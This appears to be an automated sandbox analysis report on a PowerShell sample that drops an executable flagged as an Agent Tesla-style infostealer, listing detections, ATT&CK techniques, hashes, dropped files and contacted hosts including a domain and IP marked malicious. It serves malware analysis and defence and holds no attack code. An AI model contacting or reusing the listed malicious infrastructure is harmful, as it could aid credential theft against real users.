Source: Yara match	File source: 00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4515067403.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2092835508.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 1992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1436, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	3 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 Windows Service	1 Windows Service	1 Deobfuscate/Decode Files or Information	1 Input Capture	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	311 Process Injection	2 Obfuscated Files or Information	1 Credentials in Registry	631 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	261 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	261 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	311 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
7dtpow.ps1	26%	ReversingLabs	Script-PowerShell.Spyware.Negasteal

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\x.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\x.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\x.exe	66%	ReversingLabs	Win32.Trojan.InfostealerTesla

Source	Detection	Scanner	Label
http://www.microsoft.co?	0%	Avira URL Cloud	safe
http://antoniomayol.com	0%	Avira URL Cloud	safe
http://ftp.antoniomayol.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
antoniomayol.com	162.241.62.63	true	true	unknown
ip-api.com	208.95.112.1	true	false	high
ftp.antoniomayol.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.2070632529.0000024A92A72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2101310896.0000024AA28BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2070632529.0000024A93D6C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000000.00000002.2070632529.0000024A9397E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://antoniomayol.com	RegAsm.exe, 00000004.00000002.4515067403.000000000280F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.dyn.com/	x.exe, 00000003.00000002.2092835508.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.2070632529.0000024A93C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2107437802.0000024AAA99A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.2070632529.0000024A93C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2107437802.0000024AAA99A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000000.00000002.2070632529.0000024A93D6C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.2070632529.0000024A92A72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2101310896.0000024AA28BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2070632529.0000024A93D6C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000000.00000002.2070632529.0000024A93D6C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com	RegAsm.exe, 00000004.00000002.4515067403.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.2070632529.0000024A93D6C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000000.00000002.2070632529.0000024A9397E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2070632529.0000024A92841000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ftp.antoniomayol.com	RegAsm.exe, 00000004.00000002.4515067403.000000000280F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2070632529.0000024A92841000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4515067403.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co?	powershell.exe, 00000000.00000002.2108900254.0000024AAAC56000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.2070632529.0000024A93C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2107437802.0000024AAA99A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000000.00000002.2070632529.0000024A9397E000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
162.241.62.63	antoniomayol.com	United States		46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586042
Start date and time:	2025-01-08 16:52:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	7dtpow.ps1
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winPS1@7/17@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 81 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .ps1 Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.253.45, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6192 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: 7dtpow.ps1

Simulations

Behavior and APIs

Time	Type	Description
10:53:00	API Interceptor	4x Sleep call for process: powershell.exe modified
10:53:02	API Interceptor	11182086x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	TR98760H.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	47SXvEQ.exe	Get hash	malicious	Blank Grabber, Xmrig	Browse	ip-api.com/json/?fields=225545
	test.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	ip-api.com/json/
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	ip-api.com/line/?fields=hosting
	1.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=hosting,query
	1.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=hosting,query
	YPzNsfg4nR.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	SAL987656700.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Resource.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	P3A946MOFP.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
162.241.62.63	Order 122001-220 guanzo.exe	Get hash	malicious	FormBook	Browse	www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	TR98760H.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	47SXvEQ.exe	Get hash	malicious	Blank Grabber, Xmrig	Browse	208.95.112.1
	test.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	208.95.112.1
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	208.95.112.1
	1.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	1.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	YPzNsfg4nR.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	SAL987656700.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Resource.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	P3A946MOFP.exe	Get hash	malicious	XWorm	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	https://AAYUSHRELOCATEPACKERSANDMOVERS.COM	Get hash	malicious	Unknown	Browse	162.241.148.33
	EZZGTmJj4O.exe	Get hash	malicious	AgentTesla	Browse	192.254.186.165
	https://e.trustifi.com/#/fff2a0/670719/6dc158/ef68bf/5e1243/19ce62/f4cd99/c6b84a/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d78873/cd64d0/869af2/e9ab57/7015c1/91dda7/f34c0a/f30b47/688cba/a1d645/18dc79/33d9f9/9ee0a0/c61099/8f2456/8e1864/996369/790047/a93a09/347b17/38082d/363d49/f88c07/81bae2/57a7bb/6027c6/942952/b2de1b/e98aef/6a05c2/91297b/c70871/7f29c3/0a450d/ad0cac/967c2a/e7cb67/6e1193/8c4088/13aef1/e1d296/5056d4/51a97e/89a35b/c13e69/fa274a/5b7c2e/a8c901/02856f/1e0211/03ca84/d7b573/7e0de3/e2bdbb/7cab47/4dd465/addb41/2076e1/85559c/dbcb2d/514505/a6a54e/41e864/abb5a5/e59e4b/8c2df6/7e5cf3/b648da/8fbd98/4c7d8a/08e6a3/72f66f/a49cc6/18211b/1e6a5c/0d4fde	Get hash	malicious	HTMLPhisher	Browse	162.241.149.91
	https://jmak-service.com/3225640388	Get hash	malicious	HTMLPhisher	Browse	162.241.149.91
	TR98760H.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	https://pozaweclip.upnana.com/	Get hash	malicious	Unknown	Browse	162.241.149.91
	https://us01-i-prod-estimating-storage.s3.amazonaws.com/598134325679181/562949954787293/Documents/1706942/Hoosier%20Crane%20Service%20Company.pdf	Get hash	malicious	HTMLPhisher	Browse	162.241.149.91
	miori.m68k.elf	Get hash	malicious	Unknown	Browse	142.7.137.184
	https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	162.214.205.216
	https://g248jqtc.r.ap-south-1.awstrack.me/L0/https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/westcommerce.com.br/e63o/1750871326/Ara/%23%3Fnl=amRpYkBhcmEuY29t/1/0109019433d34740-32de3bb4-8eb6-4b18-a944-d8e7ee993673-000000/ImcP_D-hsLxxvDJopI2vRjkqrI4=188	Get hash	malicious	Unknown	Browse	50.116.112.103
TUT-ASUS	TR98760H.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	47SXvEQ.exe	Get hash	malicious	Blank Grabber, Xmrig	Browse	208.95.112.1
	test.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	208.95.112.1
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	208.95.112.1
	1.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	1.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	YPzNsfg4nR.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	SAL987656700.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Resource.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	P3A946MOFP.exe	Get hash	malicious	XWorm	Browse	208.95.112.1

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1628158735648508
Encrypted:	false
SSDEEP:	3:Nlllulhhf/z:NllU
MD5:	B283C769D040651AA26FFE7F1296E297
SHA1:	F4B1D91D58C72B439EA4CA55A3E75F5F53A117E5
SHA-256:	97677EADF7A2FB6F27A32BAA73C5471A5BA31702A36509AB9FEB478448B2D837
SHA-512:	9114535C2EA58850D30DFA7552F420FBAB32FBFD999B0CAC0B8CB050F27EF65FE5BC3749E78B35A2C489561571B5452182197A51DC2B82ADC6DD70D94BEA03D7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgusurrw.42y.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3sxd0er.opv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\x.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	7.890578871500804
Encrypted:	false
SSDEEP:	6144:DT9nXr8bxYfMPcy4OmBag1+pF0lsmxRQQc+gpvEUkxNl:XNQb2fMPSOCwpCFRj0p8UkxNl
MD5:	10454890A3D7C7C0B7EC0BF7018141E4
SHA1:	167AB9A5A9E0C56689F73D894A397B9C176701DF
SHA-256:	91FEE98B5957D145F144B61107EA0283FC3E02EB7E19B432E868EE45FFDC528E
SHA-512:	20518FD44AFF080FDDAC3A508BCC3B29336EA87C868BD0FAF639726B36479DE4562EC639E425DBE06234BA5B4629DA84B37228B199F8497A7777D36638F77E04
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K(..........."...0..~............... ... ....@.. ....................................`..................................%..W.................................................................................................... ..H...........PR...Sq<..... ......................@....text....{... ...\|.................. ..`.rsrc................v..............@..@.....................\|.............. ..`.reloc...............~..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7132353076471962
Encrypted:	false
SSDEEP:	96:IGIbCrokfkvhkvCCtqEw/F3HJEw/F2XHy:IR8hDqEwjEw/
MD5:	5C33A0C6BB0FDA8F7D94D42C5A8191C8
SHA1:	D5D039DC6DF85F5CA6E5321FA1092AD178F3048E
SHA-256:	40BCC8E6DBEF0178A0D028CFAB13960356B3F0E169D96A70EB0879369FB3E5B7
SHA-512:	22DFEB4799C57D23BB5B808F1ECD808353145F97B0F158A73DD0F10D2F74439DA365102B90F8931FD156322188A37A6E8D342CBD1FD22E460AA13AF40DB9AE34
Malicious:	false
Preview:	...................................FL..................F.".. ...d........c.a..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....N}.^.a....)c.a......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl(Z.~....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....(Z.~..Roaming.@......DWSl(Z.~....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl(Z.~....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl(Z.~....E.....................a_..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl(Z.~....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl(Z.~....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl(Z.~....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VNW8BYZ5ALUK410RGVG0.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7132353076471962
Encrypted:	false
SSDEEP:	96:IGIbCrokfkvhkvCCtqEw/F3HJEw/F2XHy:IR8hDqEwjEw/
MD5:	5C33A0C6BB0FDA8F7D94D42C5A8191C8
SHA1:	D5D039DC6DF85F5CA6E5321FA1092AD178F3048E
SHA-256:	40BCC8E6DBEF0178A0D028CFAB13960356B3F0E169D96A70EB0879369FB3E5B7
SHA-512:	22DFEB4799C57D23BB5B808F1ECD808353145F97B0F158A73DD0F10D2F74439DA365102B90F8931FD156322188A37A6E8D342CBD1FD22E460AA13AF40DB9AE34
Malicious:	false
Preview:	...................................FL..................F.".. ...d........c.a..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....N}.^.a....)c.a......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl(Z.~....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....(Z.~..Roaming.@......DWSl(Z.~....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl(Z.~....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl(Z.~....E.....................a_..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl(Z.~....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl(Z.~....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl(Z.~....q...........

C:\Windows\INF\WmiApRpl\WmiApRpl.h

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

C:\Windows\INF\WmiApRpl\WmiApRpl.ini

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
Category:	dropped
Size (bytes):	48786
Entropy (8bit):	3.5854495362228453
Encrypted:	false
SSDEEP:	384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
MD5:	DF877BEC5C9E3382E94FEA48FEE049AC
SHA1:	1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
SHA-256:	7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
SHA-512:	433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
Malicious:	false
Preview:	.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

C:\Windows\System32\PerfStringBackup.INI

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	data
Category:	dropped
Size (bytes):	840878
Entropy (8bit):	3.4224066455051885
Encrypted:	false
SSDEEP:	3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
MD5:	D3ED23A3E63ACA8CF656C585568DA6D7
SHA1:	1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
SHA-256:	AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
